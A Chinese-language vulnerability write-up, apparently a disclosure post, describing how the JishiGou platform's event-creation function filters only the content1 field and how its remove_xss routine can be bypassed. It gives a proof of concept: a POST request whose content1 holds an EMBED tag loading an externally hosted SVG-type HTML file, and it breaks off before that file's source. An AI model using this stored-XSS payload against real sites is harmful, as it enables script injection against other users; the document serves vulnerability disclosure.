问题出于 /jishigou/modules/ajax/event.mod.php 的 create()函数 (创建活动的函数)
这里直接贴完整个函数的代码
$post 即代表 $_POST
全部变量都有经过 jpost的处理 (进行htmlspecialchars, strip_tag)
唯有 $f_rets 变量只进行了filter函数的处理 ($_POST['content1'])
filter函数我们来看看~
由于代码太长我就不贴了
filter 函数主要是过滤了 <script><iframe><style><link><meta> 的HTML标签
过后又调用了 remove_xss 函数来进行过滤
remove_xss把javascript, vbscript, meta, script, object, iframe, frame, frameset, base等HTML标签给过滤掉了
而且还把全部的 onerror之类的东西给过滤了
但总还是有办法的,我来贴出POC (感觉我在长篇大论)
对 http://localhost/jishigou/ajax.php?mod=event&code=create 发出POST请求
fromt 是开始日期
hour_select_from 是开始日期的小时
min_select_from 是开始日期的分钟,其他不用说了吧
content1 我设置成了 <EMBED SRC="http://localhost/aaa.html" type="image/svg+xml"></EMBED>
SRC需放你的平台的个HTML文件...
http://localhost/aaa.html的源码是